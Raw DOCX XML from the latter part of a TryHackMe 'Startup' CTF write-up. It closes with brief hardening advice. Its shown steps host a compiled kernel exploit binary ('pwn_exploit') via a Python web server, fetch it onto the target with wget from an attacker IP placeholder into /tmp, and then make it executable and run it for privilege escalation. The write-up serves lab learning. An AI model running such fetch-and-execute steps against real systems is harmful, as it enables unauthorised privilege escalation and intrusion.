    </w:p>
    <w:p w14:paraId="3E9606A5" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t>Now that you have the compiled binary (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>pwn_exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>), you need to host it so the target can download it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C89CD52" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t>On your Kali machine, in the same directory as the binary, start your Python web server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D969369" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A20E11" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180283CF" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="009D743E">
        <w:t xml:space="preserve">python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D743E">
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338769AD" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEDE4A4" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D695CC3" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4: Download it to the Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E18A857" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FEE30E" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Go back to your terminal connected to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>TryHackMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D743E">
        <w:t xml:space="preserve"> box (as the user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>lennie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>). Move to a directory where you know you have write access, like /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27595492" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290E3FA1" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ABCE1E" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="009D743E">
        <w:t>cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="340F2B71" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D743E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="009D743E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;YOUR_KALI_VPN_IP&gt;/pwn_exploit</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="45026006" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072A9515" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A60460" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5: Execute the Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07027DC4" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059F8619" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t>When you download a file, Linux removes its "execute" permissions for security. You have to add them back before you can run it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E821E8" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:r w:rsidRPr="009D743E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B699D4C" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D743E">
        <w:t xml:space="preserve"> +x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>pwn_exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6DC4222E" w14:textId="77777777" w:rsidR="009D743E" w:rsidRPr="009D743E" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="009D743E">
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D743E">
        <w:t>pwn_exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4213959C" w14:textId="77777777" w:rsidR="002E4036" w:rsidRDefault="002E4036"/>
    <w:p w14:paraId="7B4C0C75" w14:textId="340AE03E" w:rsidR="001623BD" w:rsidRDefault="001623BD" w:rsidP="001623BD">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0392B"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="1A1A2E"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4049A961" w14:textId="77777777" w:rsidR="001623BD" w:rsidRDefault="001623BD"/>
    <w:p w14:paraId="749AB81A" w14:textId="0B1DE930" w:rsidR="001623BD" w:rsidRDefault="001623BD">
      <w:r>
        <w:t xml:space="preserve">Make sure to configure all the plugins and services properly and remove default accounts and passwords, have strong passwords and make sure the public has the least of the resources accessible. Close unused ports. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15768E2A" w14:textId="5D91190D" w:rsidR="002E4036" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>TryHackMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> CTF Writeup — For educational purposes only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFCC414" w14:textId="77777777" w:rsidR="008D31C5" w:rsidRDefault="008D31C5">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01DB5561" w14:textId="195B354E" w:rsidR="008D31C5" w:rsidRDefault="009D743E" w:rsidP="009D743E">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6375"/>
        </w:tabs>
        <w:spacing w:before="200"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D16E537" w14:textId="77777777" w:rsidR="008D31C5" w:rsidRDefault="008D31C5">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C27F383" w14:textId="77777777" w:rsidR="008D31C5" w:rsidRDefault="008D31C5">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70890C45" w14:textId="77777777" w:rsidR="008D31C5" w:rsidRDefault="008D31C5">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="640F711F" w14:textId="77777777" w:rsidR="008D31C5" w:rsidRDefault="008D31C5">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5455F39E" w14:textId="77777777" w:rsidR="008D31C5" w:rsidRDefault="008D31C5">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DAF1BAA" w14:textId="77777777" w:rsidR="008D31C5" w:rsidRDefault="008D31C5">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7842EF84" w14:textId="6C1298FF" w:rsidR="008D31C5" w:rsidRDefault="008D31C5" w:rsidP="008D31C5">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="008D31C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60BFD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F84AE8A4"/>
    <w:lvl w:ilvl="0" w:tplc="897E3888">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="3766966E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="690E96FE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="03366F78">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="D6704736">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6B8C6B42">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4A24C4C0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="9586D3EC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="945E466C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="51FD0B90"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A466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34200859">
    <w:abstractNumId w:val="0"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="6852088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036"/>
    <w:rsid w:val="0000058A"/>
    <w:rsid w:val="001623BD"/>
    <w:rsid w:val="002E4036"/>
    <w:rsid w:val="00301E66"/>
    <w:rsid w:val="004B269C"/>
    <w:rsid w:val="005A77C4"/>
    <w:rsid w:val="008D31C5"/>
    <w:rsid w:val="009D743E"/>
    <w:rsid w:val="00D4731A"/>
    <w:rsid w:val="00E332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F5C30"/>
  <w15:docId w15:val="{78559A22-34B9-41DC-AA88-5998391AB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3BD"/>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01E66"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="code">
    <w:name w:val="code"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="codeChar"/>
    <w:qFormat/>
    <w:rsid w:val="005A77C4"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="codeChar">
    <w:name w:val="code Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="code"/>
    <w:rsid w:val="005A77C4"/>
    <w:rPr>
      <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D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medium.com/@michaelshroud01/startup-tryhackme-ctf-walkthrough-78b198c44a1a0" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-6074/trigger.c"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7</Pages>
  <Words>865</Words>
  <Characters>4931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KAI Thilakarathne</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <cp:lastPrinted>2026-04-17T11:19:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-17T11:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-23T09:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>